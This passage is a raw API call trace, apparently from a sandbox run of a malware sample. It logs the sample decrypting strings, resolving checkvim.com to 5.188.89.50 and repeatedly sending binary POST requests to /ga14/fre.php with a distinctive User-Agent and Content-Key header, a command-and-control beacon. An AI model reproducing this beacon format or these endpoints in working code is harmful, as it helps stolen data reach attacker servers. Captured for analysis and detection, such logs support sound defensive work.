[0265.472] recv (in: s=0x3d8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0265.851] GetProcessHeap () returned 0x840000 [0265.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0265.851] GetProcessHeap () returned 0x840000 [0265.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0265.851] GetProcessHeap () returned 0x840000 [0265.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0265.851] GetProcessHeap () returned 0x840000 [0265.851] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0265.851] closesocket (s=0x3d8) returned 0 [0265.885] GetProcessHeap () returned 0x840000 [0265.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c98 | out: hHeap=0x840000) returned 1 [0265.885] GetProcessHeap () returned 0x840000 [0265.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0265.885] GetProcessHeap () returned 0x840000 [0265.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0265.885] GetProcessHeap () returned 0x840000 [0265.885] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0265.890] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xad8) returned 0x3d8 [0265.926] Sleep (dwMilliseconds=0xea60) [0265.979] GetProcessHeap () returned 0x840000 [0265.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0265.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.980] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0265.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.991] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fac8) returned 1 [0265.999] GetProcessHeap () returned 0x840000 [0265.999] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0266.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.000] CryptImportKey (in: hProv=0x86fac8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0266.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.002] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0266.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.003] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.003] GetProcessHeap () returned 0x840000 [0266.003] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0266.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.004] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0266.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.008] CryptDestroyKey (hKey=0x87e930) returned 1 [0266.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.009] CryptReleaseContext (hProv=0x86fac8, dwFlags=0x0) returned 1 [0266.010] GetProcessHeap () returned 0x840000 [0266.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0266.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.011] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.011] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.012] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.013] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.013] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.014] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.014] GetProcessHeap () returned 0x840000 [0266.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0266.014] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0266.015] GetProcessHeap () returned 0x840000 [0266.015] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0266.015] GetProcessHeap () returned 0x840000 [0266.022] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0266.022] GetProcessHeap () returned 0x840000 [0266.022] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0266.022] GetProcessHeap () returned 0x840000 [0266.022] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0266.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.023] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0266.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.029] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fdf8) returned 1 [0266.051] GetProcessHeap () returned 0x840000 [0266.051] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0266.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.052] CryptImportKey (in: hProv=0x86fdf8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0266.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.053] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0266.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.054] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.054] GetProcessHeap () returned 0x840000 [0266.054] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0266.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.055] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0266.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.056] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0266.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.057] CryptReleaseContext (hProv=0x86fdf8, dwFlags=0x0) returned 1 [0266.057] GetProcessHeap () returned 0x840000 [0266.057] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0266.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.058] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0266.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.059] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0266.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.060] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0266.060] GetProcessHeap () returned 0x840000 [0266.060] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0266.060] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0266.063] GetProcessHeap () returned 0x840000 [0266.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0266.063] socket (af=2, type=1, protocol=6) returned 0x3dc [0266.064] connect (s=0x3dc, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0266.136] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0266.136] GetProcessHeap () returned 0x840000 [0266.136] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f2d0 [0266.136] GetProcessHeap () returned 0x840000 [0266.136] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0266.137] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0266.138] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0266.138] GetProcessHeap () returned 0x840000 [0266.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0266.138] GetProcessHeap () returned 0x840000 [0266.138] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0266.138] GetProcessHeap () returned 0x840000 [0266.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f9e0 [0266.138] GetProcessHeap () returned 0x840000 [0266.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0266.139] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0266.139] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0266.139] GetProcessHeap () returned 0x840000 [0266.139] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0266.140] GetProcessHeap () returned 0x840000 [0266.140] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0266.140] send (s=0x3dc, buf=0x873a58*, len=237, flags=0) returned 237 [0266.141] send (s=0x3dc, buf=0x87eb58*, len=159, flags=0) returned 159 [0266.141] GetProcessHeap () returned 0x840000 [0266.141] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0266.141] recv (in: s=0x3dc, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0266.856] GetProcessHeap () returned 0x840000 [0266.856] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0266.857] GetProcessHeap () returned 0x840000 [0266.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f9e0 | out: hHeap=0x840000) returned 1 [0266.857] GetProcessHeap () returned 0x840000 [0266.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0266.857] GetProcessHeap () returned 0x840000 [0266.857] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f2d0 | out: hHeap=0x840000) returned 1 [0266.857] closesocket (s=0x3dc) returned 0 [0266.858] GetProcessHeap () returned 0x840000 [0266.858] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0266.859] GetProcessHeap () returned 0x840000 [0266.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0266.859] GetProcessHeap () returned 0x840000 [0266.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0266.859] GetProcessHeap () returned 0x840000 [0266.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0266.859] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x9d8) returned 0x3dc [0266.862] Sleep (dwMilliseconds=0xea60) [0266.864] GetProcessHeap () returned 0x840000 [0266.864] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0266.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.865] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0266.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.880] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0266.898] GetProcessHeap () returned 0x840000 [0266.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0266.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.899] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e930) returned 1 [0266.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.900] CryptSetKeyParam (hKey=0x87e930, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0266.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.901] CryptSetKeyParam (hKey=0x87e930, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.901] GetProcessHeap () returned 0x840000 [0266.901] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0266.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.902] CryptDecrypt (in: hKey=0x87e930, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0266.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.904] CryptDestroyKey (hKey=0x87e930) returned 1 [0266.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.905] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0266.905] GetProcessHeap () returned 0x840000 [0266.905] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0266.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.906] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.907] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.909] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.909] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.910] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.910] GetProcessHeap () returned 0x840000 [0266.910] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0266.910] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0266.910] GetProcessHeap () returned 0x840000 [0266.910] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0266.910] GetProcessHeap () returned 0x840000 [0266.910] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0266.910] GetProcessHeap () returned 0x840000 [0266.910] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0266.910] GetProcessHeap () returned 0x840000 [0266.910] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fa70 [0266.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.912] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0266.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.918] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0266.929] GetProcessHeap () returned 0x840000 [0266.929] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0266.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.930] CryptImportKey (in: hProv=0x86f820, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e430) returned 1 [0266.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.931] CryptSetKeyParam (hKey=0x87e430, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0266.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.934] CryptSetKeyParam (hKey=0x87e430, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.934] GetProcessHeap () returned 0x840000 [0266.934] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0266.935] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.935] CryptDecrypt (in: hKey=0x87e430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fa70, pdwDataLen=0x19f9a4 | out: pbData=0x87fa70, pdwDataLen=0x19f9a4) returned 1 [0266.936] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.936] CryptDestroyKey (hKey=0x87e430) returned 1 [0266.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0266.937] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0266.938] GetProcessHeap () returned 0x840000 [0266.938] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0266.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.939] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0266.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.940] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0266.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0266.941] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0266.941] GetProcessHeap () returned 0x840000 [0266.941] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713d0 [0266.941] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0266.944] GetProcessHeap () returned 0x840000 [0266.944] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b28 [0266.944] socket (af=2, type=1, protocol=6) returned 0x3e0 [0266.944] connect (s=0x3e0, name=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0267.014] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c20*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0267.014] GetProcessHeap () returned 0x840000 [0267.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0267.014] GetProcessHeap () returned 0x840000 [0267.014] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0267.015] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0267.016] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0267.016] GetProcessHeap () returned 0x840000 [0267.016] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0267.016] GetProcessHeap () returned 0x840000 [0267.016] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0267.016] GetProcessHeap () returned 0x840000 [0267.016] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc20 [0267.016] GetProcessHeap () returned 0x840000 [0267.016] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0267.017] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0267.018] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0267.018] GetProcessHeap () returned 0x840000 [0267.018] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0267.018] GetProcessHeap () returned 0x840000 [0267.019] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0267.019] send (s=0x3e0, buf=0x873a58*, len=237, flags=0) returned 237 [0267.019] send (s=0x3e0, buf=0x87eb58*, len=159, flags=0) returned 159 [0267.019] GetProcessHeap () returned 0x840000 [0267.020] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0267.020] recv (in: s=0x3e0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0267.378] GetProcessHeap () returned 0x840000 [0267.378] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0267.378] GetProcessHeap () returned 0x840000 [0267.378] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc20 | out: hHeap=0x840000) returned 1 [0267.378] GetProcessHeap () returned 0x840000 [0267.378] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0267.378] GetProcessHeap () returned 0x840000 [0267.378] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0267.379] closesocket (s=0x3e0) returned 0 [0267.379] GetProcessHeap () returned 0x840000 [0267.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0267.379] GetProcessHeap () returned 0x840000 [0267.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0267.379] GetProcessHeap () returned 0x840000 [0267.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0267.379] GetProcessHeap () returned 0x840000 [0267.379] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713d0 | out: hHeap=0x840000) returned 1 [0267.384] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x10b0) returned 0x3e0 [0267.386] Sleep (dwMilliseconds=0xea60) [0267.388] GetProcessHeap () returned 0x840000 [0267.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, 